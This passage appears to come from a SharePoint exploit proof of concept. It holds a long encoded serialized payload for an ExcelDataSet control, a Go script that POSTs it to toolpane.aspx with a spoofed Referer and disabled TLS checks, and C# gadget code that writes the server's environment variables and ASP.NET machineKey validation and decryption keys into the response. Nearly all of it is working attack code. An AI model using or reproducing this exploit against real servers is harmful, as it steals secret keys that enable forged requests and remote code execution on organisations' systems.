JayB0q87lTVK2ktITVa4XBjVNBAOxSK5XlrzeCllmYirn4iqoh1RWg1sunZjKgXhvNR7o9GDPUTL%2FLKGwH6nLa0VGIEI1DDAVNgZqohG3boh%2BDaZLUqoa%2BAgUUWYCMSZ65i15v2SJSJTJI9BqojwFcA1DR7sAHizKG0vLUWkJ7Zqetyy9TKWdlMOkvAv0CpVTS5azWN7fCr1OZSbQLSqvLN0WhgY6m0OBuHktlDtRIXgml30quX%2F9np47sfleVDVxJ6o1USW45obK95aZIY98b5mvRQ3jCWqqqGugzI1JZTO%2BaVLZCuR1L7kfxDdtOS6jT%2BOOrBufylncwPg1sbBQQvTVWC1SqcVlVdSqiVv1%2BAhPQpk6NCF99seTshaT3KWO8q7p5lpZ1%2Bj%2BICgWj7Jzx3BW9ai1coWiCyN7GCC2Q2wyEQ%2B%2BsKUk8ZAl6lEz4%2Bar4hR%2FmVl3hhim103iwHCF2KeDf%2FjHiHNiBX50Nh72dmP2t0PyT%2FRCEvccrH4LMWA48futUOgPsGxuQ3UGUYg4q1U8q5fC%2B4gj8g1OryraFdSDjw444QgThpOzM%2F1MM%2BuRXzSz5HMdeM0QY4Q2fPsd4sCprJdN7gfA2bDH3hQxeFTaC22c8StK2%2Bk3Y8LZsZSZ02%2FddSP7QHGvl%2BsKK4fYsV8VrV4xN%2BybiEGz3F8LcDtGaQZajF2ttUfcSTQx8ezQgKsu7ZwnWujH7ekZQbhHzbEvlJqbCzfC8ENfLzUHveYceZGwA1%2F%2B2H%2FCg5YR7ilOQb6imNQvU9xK8fgTzyh2ucdYDrhXdvOIlYWEZyPPM8w0tz7aJXVtD7Fu0uct5WiYb5H%2FEEsl9C117GO%2B4pRfSmCcrp%2BLrUAP4CnjsUjfjyylAnx0d%2BYsgOsG8rDxdQfxWcgx46P6XTzvZRFT6yybRHPwIYt2hO8W%2FDQvrrVh0vegbxbxLIN8UzKWdYj%2BJT2Qm%2FB7XYGcRs7pFlme2t0W8kbK1svpyIt1BfAgGSCZOMaXkIvoGF9i3vXyzdBFfgNwOc4VeqvoUVv0Z3POQGmivzn00nQjZys0kgmmswFdmWG8RI%2BkjgV8ILdGaWpFOvULWXK2Q8hgKicSDiZE42I07PnI6ek8VqFlx4PcGHBtipOR75A0eODTALrgIC9H9yjfd1H%2F7PlTbZJ7GuDuR33lBOeJ%2BxewH%2Bk755ESPiQ5ALQDXQzkT7ocrwo7byJvBjpGu6yH%2BBR8nArNLgxydixpD3tX6a6FmhF1C6b%2FN5Qwv8CxgPkHzhFHPspeGNeY1JRQVKoCOrMQ6Bs5huBz4KMkP6LUCeBHGRkxCCRcWP6tMAZUNqg%2FJ6Z%2BGmJA%2FhLwaDEeU%2FgZVL8hbgL0X1lh3lVK5GeIcoh2U%2BClZKi%2BGysRlR2G62H%2BVO5pPnTJE9TgMweAXxkI0PogyvAPhPKGnLY7xk%2BUb%2BBTmZkGwVnDBxe%2BBbg0buoX9AFea7p%2BhIdWMkB79CPxBt3GAvqDJEjA4%2BL6dI1x0PNYKdJ4QFfYd6I%2FnAoaB43T4Ptbos%2FIIleK%2FE64VhUMETyuAz%2FgtafnGMeG4KK99qnt7W6B2mMc3H6fppuX8H0QS3oDT4bDfMd99zQO0LFB%2FQKORvXn1D%2F0P3xMV%2BXuA3xfczuim%2BQj4w98oF%2BW7Bf9gI%2B4bgBfeQ3bciA8gP86oSf4hLg0QPmof1VMsiS7sm%2FgOCZcGNYTvAFtDkeeG49pDVyLTLNExhzGmXmAa9CWSoKDMIng8H3IEtMaOEpdKqDdE2N5LJOlDuJLiU8iU0wLeMQCIQ7mcjl2yB6NR2fZ3ic0Y3weyaraPdN1O%2BEJ4CwSHj%2BSmaBKfttn6T30BrgFSi6RT8YJPlYoaSVxhl6xnqOcIP6R%2BgkcPqO%2FNY%2BxpT%2FQ8DWP3UrGXlXd7oXu1QPk0kC%2FQYDA%2F2l6lLBgQGlLhDcF8vk3BBtBGcbG8rEivrCcAM4t86crbQfgSFsWE78sshHQAZZ16Eyd6oH%2FXepnyHJUoPYTgt8gnSx3ST7zpCsNS%2BxIzpoW8IAc4fkYumV%2FYDzg84MuDUgeZtR%2FSo6YF6jffKTD2op4UBQ66RxsaKq%2BUMMKj4%2ByexW2GQ%2FjOYNrke0gOSebC3kVqv5J42d5hS2mpPKb4L7iqM7dm8zrDOa%2BTnVYng6hauv8wrPH00yhOi1j7lIUFaGAFWAnTunublex1fs5Ba1tzUK2T6naeA63dkr3%2FDKtMQWFm4qQZRlxIV9bBQrfbzgXRzGHUl1QfKFNMgyrIWFlxZ7SbWgTo40SU%2F9Y0YEBnnZvlDaV0xuyqto0c6PZGqxs1asoGY%2FalQOCofuMT4%2FWOrSbSivGQoWmlMeDirqrtspjrQRY7XbLbGrhtN1smQq1Ryx9DMornHMA3cZOH%2F5O3IHf2OqP4edKfwP58D2tRXLo1IiR80sdNwW%2BfibkepwPfeJAjLH1poih4Ncgry6S9cPQaWMNFPrLx%2B0129NU4vvb8Y0CfyAKUL4DBy08PqksSd6PrMZzz7ngBeyB9ZD%2FSx245nUSzDkdoV9TqQsd%2BQbEfJQSgt%2FE%2BRqUBl3zUc9ob65o7fEZzSon9ahX%2Fn0KOU6wkw3pJX6TkfhhsP08B0Rkk%2FlAEpHhwHzz3AEbjblxdfJleI5MDjVWaljeoK4xd%2BA5z%2BuANxMaz0Fo1xVtniMHmJsIvUDWpzmPFqtkCZ%2BmKjOtlOik%2FFuqPeIC9k8xhzB8zEEZ7ofmOnkwRg0ePOWpCE%2F2KzBengMPF%2FXP53aa63HcCtGk9oyv9NHQH8cBq3Q8INjHw3gDug6QHCb6xTS3wq%2BPKf7gg51RwEN8grnOS%2BDwHA1fi%2F0jnivhi7JcyJV2pPaIBeD%2F8TnTj%2BKaFN%2BM345PM6HPQ7yHevDTmW9P0umMPpJeNFXQoIAf5CiWvrOb%2BHGjZ3zS5%2Bj97fg%2FRgFeEJGslQu0345vFPhfSQGN1qwRIp%2F2fPWKvGcK%2BdwF5f1GSV4Re%2FpW2BOzl2Ld4n1Pqm1vKI8n85u7Uw60WxxjrYDWmKrKhKbc8g%2FitGewgRz3rj495nMpx7q0c2OcH%2FdnIS9sr4ED54LbWA%2BQeV8zaITpvXxmEaXbb3%2BhvXzt3alvrHE4EeMq95sh1057wtzKdFVNra%2F8bnsx0UT6OQNe2%2BuEqbw7YpLfrd%2BWXJiSe7qSPYnBVC6mBnKTHHIOVYrbqBqmcRzsUxkm7%2Bfsqif%2B7RbuTNsc8%2Fbgg9Ne94eQMwf75zi%2FrqXlxDbRTub3I7HvZddP5%2BMnxZMsfg3ZoD2KxoNsFLEn1g9Ba%2BwnpH1oZ%2BM535sa8prBF5MfwF57OcS00W4xmMTBcX3nPiPX8qkvVSn7vV0Ga03hLdamsDYHPtHeTyUL3VwMaC3FbmFtwt7c9qr5Zk7LDg7dHPYAHJpGN74po0myZ5X2UsBjaqfkRy66B9P5s%2FITn%2BSH9jqI5nX595Cfy%2F2CWLfZsA3EnsAz%2BD2xS7dj2%2FelZMzOfCHZyKx6n7S%2FOjzaadrTOSjrbqpdF%2BtA4ReTsS%2FHAymzbRZVizfuIhI77cmem%2FWjDPOBTQQc69Eu%2BCS8gmBPKNQpRyL8PebFT7I%2Fst3%2FA%2FtT17%2Bavp7LSpCSFT6fsnVTO9qDnIijHZR7kni%2FK%2FtoYoBMKnLD8Wl%2FfscIN167eCYTtaw%2Fx3mI%2Feuss2e2qxtmTrpqfjVdTfPjYb%2F9V5qLBqm5qJLMRdnn5iK5%2F0bORU1qr4apdyXsST20TV6XJ%2F2btfawm4d6qIyx52Dawtr2wMa%2Bi75570gcjCb1q2XPYfxd9E0cnHs7auYGu0bPyjYM7TBo8d70h7Hy2I7yJnhPKO1bS%2F0nyS35PoC0Wffs5i3O7MzluxhT2KRcOIMPpmH%2FycLJYa4IoV8RNlwxDJrqFfMI4%2FfzU1nRpE3OqGqHxwFeNlLvxWh%2BSr%2BwVgb34rR%2FpU17ZIawleTru70SzoszjHk%2B6BU3sMf0rtPMofx%2FTs842DOS2Ft6rykZK%2BV8lPqXsDWawvklnmdUi%2FlkVXhc8v0qfp9ITJnPmpyY%2BFeRqGJ5lEtNvjxkHmWyBZ46veTdmediQoY9xt6PnaSF5a%2BTfSxYTW3EJ3kBXQ17Bv8rTL1fI%2FeMTceYsyA7k%2FUJDs1VFbNYP9mpttNzjr5IfYr9Vz0z9KbhxolKz%2BKndiUNgA0NUb4YxaMOpX3u8ryMhTkmHj%2BWr8xgzY8O3lTLm8dRlx%2BYbWmfdylYUoe6LGcK1iuPsGTzsClh8fOkX%2BaZ2ZExNfOjcZK%2FEx2ef5domeIP5oEW9lV5qfeUxuPTviQng31Q2GtjtX161%2BZhX1JXP2D%2F1xr2s1ietbD%2FivbxkB9g3wwg%2Byr2uPnGeOtoHNM3nUf9aQr2eWId8m%2FnM7K5pI12KldgQAfvL%2BYqdQS4vexX8YUv5O9Euy83f01%2FSOYpLpWQZXv4CXkJQGA54%2F1patDi2P1v1S05n7RYVsraiR5yPyH2fBm4l2HZMbs0L6A9jV8NeW4YS5tXrWG%2FG9rZe5bJlnKMMSzILPmrkDWs65KcQXXioHnusyIHZIWsZmpH6pRUU0RrdPEJ%2FKtqu%2B2gZ82tGXwke%2B3XLId9r3r46W0f56WSeTbQWd%2FlOzgO%2BxwHkbKxM3szyH3LZ%2FxR4olLHVRt%2BX5cj3VhTPs42Z%2F24rlC79fRWheJoXx%2B3qbPfuj4PD6B%2FFW1ox0%2B1NSp0Y8%2Fqd6DvBkpeePfddD8oLx9y398y398Ykxr3sr3YJPS4fzzWOh%2FNFky%2BL1LkU32oZ%2FyWNAf9vukvxjep%2BeVgRwzvaslWvbn5cgu5i6pw9rZ%2FvY55p%2BZfBfkN9JV5ja%2FJl2DR3vzJ8FChhxzbBUjeyhtHwekDbjBx3nTybpR81su6xNzJ1ZUgi9tj93JV9P99%2FRbCZ9%2Fn%2F78nQxnybqEXIEf2Tf0vjR0zUzp2jKta0PZB%2B%2FB0KbmFrDDQa8QpN7VID3hfX3GSRdVF3ri9PRNNdVPam6speZG7nVrfdgX%2B4Po3deIh75sjv8y9pnx2%2FlaKl78Y6xVWA6%2F86rmzt%2FjgmzWU7pwSOuCJ%2BU1dyHrjHf14n0w8hd99hfDC1lM3rXJ0ztvmG%2FUk13upOzyiO3yQPmgXf6iawVnMvfwnuIXW6dIeFBLSmPEPvvpXbDkWzMsV8qM8zs3FvKClP9o94qglw6b0q2JLq35KHLNvC%2B%2FsyLtaPhaynPhIr%2F68K0ipQx%2BUc7FdGfNDPKP9077IhZoT427%2BDwn%2FZBbBw0gF5RnwXpBvjUGL8Oafi5DNWkQgWPhlO%2FlTJmIPjHfS%2B93rYHbtN2VH31SOwzAkvktmYMLuBvk1uVHDvhXPfG24vfCqczNmncDC%2F8B%2FmPzzsG1g2sH1w6uh7ge4nqI6%2BHFLjpVePRdKaSw%2Bb%2BjlczMm8kSm1a2b0StbJaxS1yNV%2B%2FeXiWf%2BnruC3uf9uGwt%2FLra9XkE2Cpj3qlP9H28pe3V%2BcVLz%2FM96EPor29%2Bo3ff3vqk4D4ft1ln%2FSxvHQvjz6r9%2Fbq4oN%2Fv%2FzlfwCdHyNKU1UAAA%3D%3D%22+DataTable-CaseSensitive%3D%22false%22+runat%3D%22server%22%3E+%3C%2FScorecard%3AExcelDataSet%3E`

	func init() {
	// We don't need security where we're going
	http.DefaultTransport = &http.Transport{
	TLSClientConfig: &tls.Config{
	InsecureSkipVerify: true,
	},
	}
	}

	func main() {
	if len(os.Args) < 2 {
	fmt.Println("Usage: " + os.Args[0] + " <url>")
	os.Exit(1)
	}
	spUrl := strings.TrimSuffix(os.Args[1], "/")
	// Replace lkx with your favorite string, or don't
	req, err := http.NewRequest("POST", spUrl+"/_layouts/15/toolpane.aspx/lkx?DisplayMode=Edit&lkx=/ToolPane.aspx", strings.NewReader(infoLeakPayload))
	if err != nil {
	panic(err)
	}
	// Says some guy hitting everything he can finds on the net
	req.Header.Set("Referer", "/_layouts/./SignOut.aspx")
	req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
	// I'm a real browser, I swear
	req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0")
	resp, err := http.DefaultClient.Do(req)
	if err != nil {
	fmt.Println("Request failed: " + err.Error())
	os.Exit(1)
	}
	defer resp.Body.Close()
	body, err := io.ReadAll(io.LimitReader(resp.Body, 32*1024))
	if err != nil {
	fmt.Println("Request failed during body read: " + err.Error())
	os.Exit(1)
	}
	if strings.Contains(string(body), "Number of Logical Drives") {
	bodyParts := strings.Split(string(body), "--------------------")
	if len(bodyParts) == 5 {
	fmt.Println("Service vulnerable, retrieved information:")
	fmt.Println(string(body))
	os.Exit(0)
	}
	}
	fmt.Println("Not vulnerable")
	os.Exit(1)
	}
	using System;
	using System.Collections;
	using System.Reflection;
	using System.Web;
	using System.Web.Configuration;

	#nullable disable
	public class E
	{
	public E()
	{
	try
	{
	HttpContext current = HttpContext.Current;
	if (current == null)
	return;
	current.Server.ClearError();
	current.Response.Clear();
	string s = "-------------------- .NET Properties --------------------\n" + $"Number of Logical Drives: {Environment.GetLogicalDrives().Length}\n" + $"List of Logical Drives: {string.Join(";", Environment.GetLogicalDrives())}\n" + $"Computer Name: {Environment.MachineName}\n" + $"Full path of the system directory: {Environment.SystemDirectory}\n" + $"Current Directory: {Environment.CurrentDirectory}\n" + $"Number of processors on this machine: {Environment.ProcessorCount}\n" + $"Number of milliseconds since system start: {Environment.TickCount}\n" + $"Username of the user currently logged onto the operating system: {Environment.UserName}\n" + $"Operating System Version: {Environment.OSVersion}\n" + $".NET Version: {Environment.Version}\n" + "\n-------------------- Environment Variables --------------------\n";
	foreach (DictionaryEntry environmentVariable in Environment.GetEnvironmentVariables())
	s += $"{environmentVariable.Key}:{environmentVariable.Value}\n";
	try
	{
	MachineKeySection machineKeySection = (MachineKeySection) Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a").GetType("System.Web.Configuration.MachineKeySection").GetMethod("GetApplicationConfig", BindingFlags.NonPublic \| BindingFlags.Static).Invoke((object) null, new object[0]);
	s = $"{s}PublicKeyToken: {machineKeySection.ValidationKey}\|{(object) machineKeySection.Validation}\|{machineKeySection.DecryptionKey}\|{machineKeySection.Decryption}\|{(object) machineKeySection.CompatibilityMode}";
	}
	catch (Exception ex)
	{
	}
	current.Response.Write(s);
	current.Response.Flush();
	current.Response.End();
	}
	catch (Exception ex)
	{
	}
	}
	}